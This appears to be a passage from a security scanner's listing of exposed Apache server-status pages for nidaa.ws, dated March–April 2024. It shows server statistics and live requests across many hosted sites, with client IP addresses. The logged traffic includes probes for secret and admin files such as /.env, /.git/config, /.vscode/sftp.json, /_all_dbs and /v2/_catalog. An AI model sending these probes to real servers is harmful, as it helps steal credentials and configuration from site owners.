      95.186.112.55http/1.1
      
      0-13296950/132/17923_
      21.3696551153382320.049.511912.74
      5.41.96.232http/1.1albayan.edu.sa:443GET /imgweb/bbhadeth1.pdf HTTP/1.1
      
      0-13296950/195/18620_
      21.4916234244634540.010.992299.37
      23.22.35.162http/1.1daris.live:443GET /bin/admin/images/3602312.png HTTP/1.1
      
      1-13275730/180/19115_
      24.31610154793320.062.052374.56
      2.90.77.89http/1.1albayan.edu.sa:80GET /web/images/name_school.png HTTP/1.1
      
      1-13275730/153/20113_
      24.29921154816390.0118.792044.41
      2.90.127.47http/1.1albayan.edu.sa:443GET /e_sch/images/footer.jpg HTTP/1.1
      
      1-13275730/210/18537_
      24.28955169472380.025.852343.60
      217.113.194.248http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=3&q=694&t=217.113.194.72&c=5 HTTP
      
      1-13275730/172/18665_
      24.488546142932920.045.341918.05
      20.168.250.118http/1.1albayan.edu.sa:443GET /imgweb/files39/mos/4.pdf HTTP/1.1
      
      1-13275730/143/18355_
      24.29855172974190.092.021648.29
      217.113.194.254http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=3&q=870&t=217.113.194.97&c=5 HTTP
      
      1-13275730/167/18537_
      24.44214136241420.096.131859.06
      37.105.168.188http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/aJLsdNH0RF9Ql1OrcBkQxc
      
      1-13275730/208/19284_
      24.42294315787719
      Found on 2024-04-28 20:35
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df7c31b7c5b

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.20
      Server MPM: worker
      Server Built: Apr 16 2024 19:56:13
      
      Current Time: Thursday, 18-Apr-2024 23:09:17 +03
      Restart Time: Thursday, 18-Apr-2024 04:05:06 +03
      Parent Server Config. Generation: 1
      Parent Server MPM Generation: 0
      Server uptime:  19 hours 4 minutes 11 seconds
      Server load: 0.51 0.63 0.55
      Total accesses: 90199 - Total Traffic: 17.2 GB - Total Duration: 78547611
      CPU Usage: u391.49 s80.99 cu0 cs0 - .688% CPU load
      1.31 requests/sec - 263.0 kB/second - 200.1 kB/request - 870.826 ms/request
      8 requests currently being processed, 0 workers gracefully restarting, 192 idle workers
      _________K__W___________________________________________________
      ___________K______________________________________K_____________
      _______W___________________________K___________K________________
      ____W___........................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-013450/417/417_
      55.85248306695067300.0161.79161.79
      185.99.33.212http/1.1albayan.edu.sa:443GET /images/slider/08.jpg HTTP/1.1
      
      0-013450/547/547_
      55.6245321093054970.0105.24105.24
      110.155.136.17http/1.1zed.sa:443GET /wp-content/uploads/2020/07/K21A21582222.jpg HTTP/1.1
      
      0-013450/497/497_
      55.32461368698920.074.1174.11
      159.65.21.13http/1.1
      
      0-013450/442/442_
      55.833236481792810.092.1192.11
      18.191.21.86http/1.1albayan.edu.sa:443GET /imgweb/86awl.mp4 HTTP/1.1
      
      0-013450/417/417_
      55.6843624769030.030.5330.53
      37.106.206.3http/1.1zed.sa:443GET /menu/wp-content/plugins/elementor/assets/js/text-editor.2c
      
      0-013450/398/398_
      55.892064751681290.045.5345.53
      51.39.197.217http/1.1albayan.edu.sa:443GET /images/slider/03.jpg HTTP/1.1
      
      0-013450/448/448_
      55.764125522761550.064.0564.05
      40.77.167.15http/1.1albayan.edu.sa:443GET /imgweb/file43/test22.pdf HTTP/1.1
      
      0-013450/404/404_
      55.8329003180590.042.7642.76
      5.255.231.138http/1.1albayan.edu.sa:80GET /albayan_library/upload/books/___________7.pdf HTTP/1.1
      
      0-013450/362/362_
      55.892031404396340.0107.87107.87
      172.70.42.9http/1.1support.daaris.com:443GET /index.php?language=dutch&rp=%2Fknowledgebase%2Ftag%2Fsharp
      
      0-013451/504/504K
      55.94011681170.8161.85161.85
      172.71.242.117http/1.1nidaa.ws:80GET /about HTTP/1.1
      
      0-013450/377/377_
      55.935543090720.031.3431.34
      85.208.96.194http/1.1albayan.edu.sa:443GET /albayan_library/BooksVi.php?b=1554 HTTP/1.1
      
      0-013450/417/417_
      55.82353322852070.0178.69178.69
      87.236.176.71http/1.1united.thenewjeddah.com:443GET /auth/login HTTP/1.1
      
      0-013450/459/459W
      46.641307001515940.058.3058.30
      35.222.190.7http/1.1akg.sa:443GET /_next/webpack-hmr HTTP/1.1
      
      0-013450/542/542_
      55.61458301800090.0201.80201.80
      103.39.209.14http/1.13dvi.com:443GET /admin/auth/login HTTP/1.1
      
      0-013450/434/434_
      55.852591006828520.0101.06101.06
      205.185.117.197http/1.1sulaimaniya.edu.sa:443POST /wp-login.php HTTP/1.1
      
      0-013450/432/432_
      55.8237711955880.045.1645.16
      222.81.36.131http/1.1zed.sa:443GET /wp-content/uploads/2024/02/LogoColor.png HTTP/1.1
      
      0-013450/546/546_
      55.4920223303060.041.0441.04
      51.36.240.20http/1.1
      
      0-013450/423/423_
      55.8522901612040.0121.01121.01
      54.37.76.179http/1.1alezdhar.com:80GET /ads.txt HTTP/1.1
      
      0-013450/450/450_
      55.933607778150.0191.29191.29
      54.36.148.197http/1.1albayan.edu.sa:80GET /imgweb/files41/87.jpg HTTP/1.1
      
      0-013450/553/553_
      55.937150769240.030.7930.79
      71.93.85.101http/1.1wahjcm.com:443GET / HTTP/1.1
      
      0-013450/471/471_
      55.8520913001310.078.9978.99
      47.128.114.135http/1.1albayan.edu.sa:443GET /e_sch/js/menu.js HTTP/1.1
      
      0-013450/408/408_
      55.9286265696810.0101.91101.91
      51.36.240.20http/1.1jawad.com.sa:443POST /api/v.1/front/visitor/count HTTP/1.1
      
      0-013450/457/457_
      55.8236807129900.077.8477.84
      45.77.218.172http/1.1akg.sa:80HEAD / HTTP/1.1
      
      0-013450/320/320_
      55.4610214908280.0132.18132.18
      2.90.89.185http/1.1
      
      0-013450/542/542_
      55.901287013299390.0127.79127.79
      51.39.197.217http/1.1albayan.edu.sa:443GET /web/468.html2 HTTP/1.1
      
      1-013460/572/572_
      56.3246126482930.058.9958.99
      92.205.170.212http/1.1
      
      1-013460/423/423_
      56.574308110664080.0120.08120.08
      85.208.96.193http/1.1albayan.edu.sa:443GET /e_sch/news_replies.php?i_f=1499&page=1&user=web HTTP/1.1
      
      1-013460/561/561_
      56.564355999608350.0110.49110.49
      37.106.206.3http/1.1zed.sa:443GET /menu/wp-content/uploads/2023/06/65-Zed-BrandGuideline-Apri
      
      1-013460/418/418_
      56.30488011323500.0147.27147.27
      41.108.172.81http/1.1
      
      1-013460/453/453_
      56.70924512030300.0119.31119.31
      51.36.240.20http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.ttf?v=4.7
      
      1-013460/534/534_
      56.73014256270.084.0084.00
      172.71.178.119http/1.1nidaa.ws:80GET /.vscode/sftp.json HTTP/1.1
      
      1-013460/473/473_
      56.708582516160.0128.04128.04
      51.36.240.20http/1.1jawad.com.sa:443GET /favicon.ico HTTP/1.1
      
      1-013460/513/513_
      56.6324395925589480.062.3562.35
      185.99.33.212http/1.1albayan.edu.sa:443GET /images/slider/04.jpg HTTP/1.1
      
      1-013460/400/400_
      56.63229073292100.062.9462.94
      54.37.76.179http/1.1
      Found on 2024-04-18 20:08
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df759dc6ebc

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.20
      Server MPM: worker
      Server Built: Apr 16 2024 19:56:13
      
      Current Time: Thursday, 18-Apr-2024 22:15:24 +03
      Restart Time: Thursday, 18-Apr-2024 04:05:06 +03
      Parent Server Config. Generation: 1
      Parent Server MPM Generation: 0
      Server uptime:  18 hours 10 minutes 18 seconds
      Server load: 0.49 0.41 0.42
      Total accesses: 87065 - Total Traffic: 16.5 GB - Total Duration: 74894907
      CPU Usage: u377.11 s77.9 cu0 cs0 - .696% CPU load
      1.33 requests/sec - 264.2 kB/second - 198.5 kB/request - 860.218 ms/request
      12 requests currently being processed, 0 workers gracefully restarting, 188 idle workers
      ___________KW____________________K____________________________W_
      ____________________________K______W________K___________________
      ____K__________________K____________________W___________________
      ____W__K........................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-013450/388/388_
      53.362783714466470.0158.94158.94
      146.190.103.103http/1.1
      
      0-013450/485/485_
      53.741016502923960.0101.65101.65
      52.167.144.140http/1.1albayan.edu.sa:443GET /imgweb/%D9%85%D8%B3%D8%A7%D8%A8%D9%82%D8%A9-%D8%A7%D9%84%D
      
      0-013450/485/485_
      53.75611679330.072.4172.41
      172.69.151.160http/1.1adyar.com.sa:443GET /_all_dbs HTTP/1.1
      
      0-013450/428/428_
      53.553211151776640.089.9189.91
      188.166.108.93http/1.1zed.brunch.ws:443GET /telescope/requests HTTP/1.1
      
      0-013450/391/391_
      53.4948354759480.029.5629.56
      51.39.141.217http/1.1
      
      0-013450/375/375_
      53.652521071467320.044.2144.21
      5.156.64.197http/1.1jilani.com.sa:443GET /public/uploads/files/1631955835_1x4-0%D9%A1.png HTTP/1.1
      
      0-013450/440/440_
      53.7641762745880.062.3462.34
      81.94.150.222http/1.13dvi.com:443GET /contact.php HTTP/1.0
      
      0-013450/395/395_
      53.5630923175850.042.6142.61
      151.255.163.164http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      0-013450/349/349_
      53.632664024059800.0104.35104.35
      151.255.163.164http/1.1albayan.edu.sa:443GET /imgweb/file43/%D8%A8%D9%86%D9%83%20%D8%A7%D9%84%D8%A3%D8%B
      
      0-013450/484/484_
      53.756211672080.0161.23161.23
      162.158.95.53http/1.1adyar.com.sa:443GET /server HTTP/1.1
      
      0-013450/358/358_
      53.7014712533078330.030.7030.70
      5.156.64.197http/1.1jilani.com.sa:443GET /public/uploads/files/1631793802_%D8%B7%D9%88%D8%A7%D9%82%D
      
      0-013451/388/388K
      53.78012817570.8177.33177.33
      162.158.94.47http/1.1nidaa.ws:80GET /.vscode/sftp.json HTTP/1.1
      
      0-013450/459/459W
      46.64983801515940.058.3058.30
      35.222.190.7http/1.1akg.sa:443GET /_next/webpack-hmr HTTP/1.1
      
      0-013450/503/503_
      53.4911501726900.0199.86199.86
      212.102.40.218http/1.1
      
      0-013450/421/421_
      53.582857596603150.091.8791.87
      5.156.64.197http/1.1jilani.com.sa:443GET /public/uploads/files/1631959693_6-0%D9%A1.png HTTP/1.1
      
      0-013450/367/367_
      53.7014921359640.041.0741.07
      138.201.201.48http/1.1sulaimaniya.edu.sa:443POST /wp-cron.php?doing_wp_cron=1713467575.72244691848754882812
      
      0-013450/540/540_
      53.6226629043206980.040.2840.28
      5.156.64.197http/1.1jilani.com.sa:443GET /public/uploads/files/5b9e0486e74ef1537082502.png HTTP/1.1
      
      0-013450/406/406_
      53.60272191566640.0119.99119.99
      146.190.103.103http/1.1kafel.akgsa.com:443GET /.vscode/sftp.json HTTP/1.1
      
      0-013450/440/440_
      53.711291027727890.0189.11189.11
      85.208.96.201http/1.1daris.live:443GET /product/87/kotlin-programming-language HTTP/1.1
      
      0-013450/542/542_
      53.67191756756330.030.5730.57
      3.142.144.40http/1.1albayan.edu.sa:443GET /imgweb/act/olya/3.png HTTP/1.1
      
      0-013450/456/456_
      53.62270152969660.071.2971.29
      146.190.103.103http/1.1kafel.akgsa.com:443GET /_all_dbs HTTP/1.1
      
      0-013450/382/382_
      53.6621115440490.099.8199.81
      95.186.29.219http/1.1albayan.edu.sa:443GET /e_sch/css/images/arrow-next.png HTTP/1.1
      
      0-013450/452/452_
      53.7757936767540.072.8172.81
      5.156.64.197http/1.1jilani.com.sa:443GET /public/uploads/files/1139.png HTTP/1.1
      
      0-013450/310/310_
      53.292683684303140.0131.39131.39
      50.60.176.195http/1.1
      
      0-013450/509/509_
      53.672056113283960.0125.78125.78
      54.36.148.147http/1.1jilani.com.sa:80GET /en/contactus HTTP/1.1
      
      1-013460/546/546_
      54.7227516475240.057.8157.81
      216.244.66.241http/1.1daris.live:80GET /robots.txt HTTP/1.1
      
      1-013460/414/414_
      54.871772026810647230.0116.34116.34
      37.243.171.73http/1.1albayan.edu.sa:443GET /imgweb/1/sincestd1.pdf HTTP/1.1
      
      1-013460/529/529_
      54.9712229584870.0108.21108.21
      5.156.64.197http/1.1jilani.com.sa:443GET /public/uploads/files/1690208192_WhatsApp_Image_2023-07-24_
      
      1-013460/412/412_
      54.292778011284330.0123.98123.98
      146.190.103.103http/1.1
      
      1-013460/433/433_
      54.6931221434730.0118.67118.67
      151.255.163.164http/1.1albayan.edu.sa:443GET /e_sch/font/css/bootstrap.min.css HTTP/1.1
      
      1-013460/525/525_
      54.7625234185360.083.0383.03
      5.156.64.197http/1.1jilani.com.sa:443GET /favicon.ico HTTP/1.1
      
      1-013460/464/464_
      54.683221022354340.0118.90118.90
      188.166.108.93http/1.1zed.brunch.ws:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
      
      1-013460/493/493_
      54.996274976050.061.0461.04
      172.70.251.218http/1.1adyar.com.sa:443GET / HTTP/1.1
      
      1-013461/386/386
      Found on 2024-04-18 19:14
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df7812f31d1

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.20
      Server MPM: worker
      Server Built: Apr  8 2024 11:46:34
      
      Current Time: Wednesday, 10-Apr-2024 20:27:52 +03
      Restart Time: Tuesday, 09-Apr-2024 04:04:48 +03
      Parent Server Config. Generation: 1
      Parent Server MPM Generation: 0
      Server uptime:  1 day 16 hours 23 minutes 4 seconds
      Server load: 0.12 0.24 0.30
      Total accesses: 154390 - Total Traffic: 14.4 GB - Total Duration: 131544485
      CPU Usage: u472.16 s81.25 cu98.12 cs20.22 - .462% CPU load
      1.06 requests/sec - 103.9 kB/second - 97.8 kB/request - 852.027 ms/request
      17 requests currently being processed, 0 workers gracefully restarting, 133 idle workers
      _K______W__W_____K_________K__K_________________________________
      ___KK_____K____KK__________________K______________K___K______...
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      .............................____KK_K_________________..........
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-0214490/1084/1216_
      94.8921946824010.077.7885.54
      152.89.160.109http/1.1
      
      0-0214491/989/1100K
      95.19322810630.845.02111.69
      172.70.46.23http/1.1nidaa.ws:80GET /.env HTTP/1.1
      
      0-0214490/951/1173_
      95.184382240300.048.7665.70
      162.158.179.6http/1.1adyar.com.sa:443GET / HTTP/1.1
      
      0-0214490/1032/1310_
      95.15234814461140.093.01108.21
      114.119.128.40http/1.13dvi.com:443GET /images/folio/thumbs/545340618584305.jpg HTTP/1.1
      
      0-0214490/920/1099_
      94.8727032996120.0111.60120.20
      167.114.209.103http/1.1
      
      0-0214490/902/1184_
      95.1140723518780.082.76103.23
      5.163.42.91http/1.1albayan.edu.sa:443GET /e_sch/images/footer.jpg HTTP/1.1
      
      0-0214490/1300/1534_
      94.7532213052990.0120.43133.19
      207.231.107.133http/1.1
      
      0-0214490/1052/1325_
      95.171061345664130.097.38105.81
      172.70.38.248http/1.1support.daaris.com:443GET /cart.php?a=add&domain=transfer&language=portuguese-pt HTTP
      
      0-0214490/860/1127W
      95.09004458950.058.8667.84
      162.158.110.66http/1.1nidaa.ws:80GET /server-status HTTP/1.1
      
      0-0214490/1087/1220_
      95.14312264451670.0143.01160.98
      138.201.201.48http/1.1zed.sa:80POST /wp-cron.php?doing_wp_cron=1712769759.75474309921264648437
      
      0-0214490/880/1047_
      94.941613164728160.0104.36116.09
      199.45.155.38http/1.1
      
      0-0214490/828/1216W
      92.74346403731820.0121.41130.22
      35.222.190.7http/1.1akg.sa:443GET /_next/webpack-hmr HTTP/1.1
      
      0-0214490/1155/1278_
      95.142791022711190.089.43103.14
      167.114.209.103http/1.1sulaimaniya.edu.sa:80GET / HTTP/1.1
      
      0-0214490/1063/1274_
      94.7727583795140.0157.94188.10
      167.114.209.103http/1.1
      
      0-0214490/1038/1273_
      95.181406707810.058.8371.22
      127.0.0.1http/1.1php.we3dvi.com:80GET / HTTP/1.0
      
      0-0214490/941/1167_
      95.1240225319220.0101.86137.55
      5.163.79.105http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      0-0214490/735/929_
      95.19015767470.051.7367.64
      172.70.46.212http/1.1nidaa.ws:80GET /v2/_catalog HTTP/1.1
      
      0-0214491/1203/1456K
      95.19012453840.882.83103.45
      172.71.131.38http/1.1nidaa.ws:80GET /.vscode/sftp.json HTTP/1.1
      
      0-0214490/1014/1177_
      95.1517923819090.0101.79125.00
      138.201.201.48http/1.1zed.sa:80POST /wp-cron.php?doing_wp_cron=1712769892.77692604064941406250
      
      0-0214490/938/1039_
      94.4936716320450.065.1475.88
      5.163.63.101http/1.1
      
      0-0214490/905/1072_
      95.1615422401870.0188.89197.70
      216.144.248.24http/1.1php.we3dvi.com:443HEAD / HTTP/1.1
      
      0-0214490/1036/1210_
      95.09424143860930.0101.51111.72
      203.2.64.59http/1.1jawad.com.sa:443GET /ar HTTP/1.1
      
      0-0214490/875/1020_
      95.1434022471980.072.3682.66
      138.201.201.48http/1.1zed.sa:80POST /wp-cron.php?doing_wp_cron=1712769731.94707489013671875000
      
      0-0214490/1041/1247_
      95.1338817287920.0148.35172.26
      188.54.55.214http/1.13dvi.com:443GET /favicon.ico HTTP/1.1
      
      0-0214490/772/1110_
      94.6721883046240.0146.29167.04
      152.89.160.109http/1.1
      
      1-0214790/991/1105_
      91.7244224968820.0119.14123.82
      52.167.144.216http/1.1albayan.edu.sa:443GET /imgweb/log3.pdf HTTP/1.1
      
      1-0214790/804/1051_
      91.7627924692920.0157.04185.61
      138.201.201.48http/1.1sulaimaniya.edu.sa:80POST /wp-cron.php?doing_wp_cron=1712769793.10049891471862792968
      
      1-0214791/848/1016K
      91.80323080560.854.3775.37
      172.70.46.144http/1.1nidaa.ws:80GET /.git/config HTTP/1.1
      
      1-0214790/1186/1393_
      91.772743482585200.0124.50172.14
      216.244.66.235http/1.1zed.sa:80GET /product/lobster-trio/?lang=ar HTTP/1.1
      
      1-0214790/1034/1347_
      91.7535913992560.0121.75132.81
      66.249.64.13http/1.1albayan.edu.sa:443GET /e_sch/font/css/bootstrap.min.css HTTP/1.1
      
      1-0214791/893/1070K
      91.80012777500.8129.65149.12
      172.69.151.233http/1.1nidaa.ws:80GET /about HTTP/1.1
      
      1-0214790/914/1191_
      91.352707232308860.066.3587.11
      167.114.209.103http/1.1
      
      1-0214790/866/1039_
      90.9731517011780.048.0959.62
      24.42.67.177http/1.1
      
      1-0214790/1036/1180_
      91.75389967542270.058.9166.32
      85.208.96.196http/1.1daris.live:80GET /category/Communications HTTP/1.1
      
      1-0214790/861/1089_
      91.7901296440
      Found on 2024-04-10 17:27
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df712e7c115

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.58 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.20
      Server MPM: worker
      Server Built: Mar 19 2024 23:10:28
      
      Current Time: Thursday, 28-Mar-2024 09:00:39 +03
      Restart Time: Thursday, 21-Mar-2024 04:04:48 +03
      Parent Server Config. Generation: 4
      Parent Server MPM Generation: 3
      Server uptime:  7 days 4 hours 55 minutes 51 seconds
      Server load: 0.01 0.04 0.05
      Total accesses: 1001464 - Total Traffic: 143.1 GB - Total Duration: 2258110871
      CPU Usage: u463.73 s52.64 cu3606.86 cs979.66 - .82% CPU load
      1.61 requests/sec - 241.0 kB/second - 149.8 kB/request - 2254.81 ms/request
      42 requests currently being processed, 0 workers gracefully restarting, 83 idle workers
      KK_K___K____KK___W__K____.......................................
      ................................................................
      ......................_____KK___K_KK_KK_K_____K_K__RKK_K_K______
      ____KK__K____K_KKK__K___R__KK__K_K___K________KKK____KK___......
      ................................................................
      ................................................................
      ................................................................
      ..WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW............
      ................................................................
      ................................................................
      ............................................................WWWW
      WWWWWWWWWWWWWWWWWWWWW...........................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-3271581/174/5521K
      20.600071809210.835.83627.94
      162.158.87.109http/1.1nidaa.ws:80GET /debug/default/view?panel=config HTTP/1.1
      
      0-3271581/184/5573K
      20.5401666034066.641.211137.60
      172.70.246.173http/1.1nidaa.ws:80GET / HTTP/1.1
      
      0-3271580/191/5688_
      20.482143869150060.073.25951.71
      195.191.219.132http/1.1alezdhar.com:443GET / HTTP/1.1
      
      0-3271581/166/5673K
      20.600177061460.819.96648.18
      172.69.150.121http/1.1nidaa.ws:80GET /about HTTP/1.1
      
      0-3271580/130/5369_
      20.5337064816330.028.62863.62
      54.36.149.27http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=1&q=945&t=54.36.149.99&c=5 HTTP/1
      
      0-3271580/140/5527_
      20.52175356801180.09.58759.86
      66.249.64.8http/1.1hawsab.me:80GET /?ben1048wxlcirb514.html HTTP/1.1
      
      0-3271580/146/5809_
      20.46288063470730.042.49711.36
      85.208.96.195http/1.1albayan.edu.sa:80GET /e_sch/news_replies.php?i_f=1596&l_n=1&page=1&user=web HTTP
      
      0-3271581/111/5329K
      20.5904910666785219.95.14583.30
      162.158.94.135http/1.1nidaa.ws:80GET /server-status HTTP/1.1
      
      0-3271580/177/5712_
      20.46265066913910.09.47921.61
      145.220.91.19http/1.1albayan.edu.sa:80GET / HTTP/1.1
      
      0-3271580/154/5827_
      20.48229196661440.021.75766.25
      40.77.167.19http/1.1albayan.edu.sa:443GET /imgweb/cur41/9th/9th%20Grammar%20WB%20T1%2019.pdf HTTP/1.1
      
      0-3271580/124/5560_
      20.5312077135200.011.43880.09
      54.36.148.102http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=3&q=919&t=54.36.150.120&c=5 HTTP/
      
      0-3271580/175/5403_
      20.453367956173820.018.24733.45
      52.167.144.192http/1.1albayan.edu.sa:443GET /e_sch/profile.php?user=web&profile=191 HTTP/1.1
      
      0-3271581/168/5560K
      20.550181266930.88.92676.67
      172.71.98.156http/1.1nidaa.ws:80GET /v2/_catalog HTTP/1.1
      
      0-3271581/141/5335K
      20.5402678037566.78.13800.92
      172.71.98.213http/1.1nidaa.ws:80GET / HTTP/1.1
      
      0-3271580/198/5744_
      20.4631712067305400.07.26916.40
      172.70.38.55http/1.1support.daaris.com:443GET /submitticket.php?deptid=6&language=czech&step=2 HTTP/1.1
      
      0-3271580/170/5453_
      20.492084875839010.09.681033.79
      185.191.171.10http/1.1albayan.edu.sa:443GET /e_sch/news_replies.php?i_f=868&page=1&user=web HTTP/1.1
      
      0-3271580/98/5637_
      20.540281549900.05.56747.37
      172.71.131.66http/1.1nidaa.ws:80GET / HTTP/1.1
      
      0-3271580/95/5522W
      20.440068015690.015.74821.37
      172.71.183.69http/1.1nidaa.ws:80GET /server-status HTTP/1.1
      
      0-3271580/135/5645_
      20.5119428055709090.039.72842.52
      40.77.167.2http/1.1albayan.edu.sa:443GET /imgweb/ektebar2222141510.png HTTP/1.1
      
      0-3271580/138/5416_
      20.49203188118120.011.53930.21
      31.167.169.234http/1.1albayan.edu.sa:443GET /e_sch/images/footer.jpg HTTP/1.1
      
      0-3271581/158/5256K
      20.5433830041467.047.96929.71
      172.71.154.99http/1.1nidaa.ws:80GET / HTTP/1.1
      
      0-3271580/168/5099_
      20.550262446420.070.39909.67
      162.158.94.240http/1.1nidaa.ws:80GET / HTTP/1.1
      
      0-3271580/134/5447_
      20.5373668398630.08.341107.91
      46.52.15.176http/1.1albayan.edu.sa:443GET /e_sch/poll.php HTTP/1.1
      
      0-3271580/116/5147_
      20.52138076535260.016.211078.37
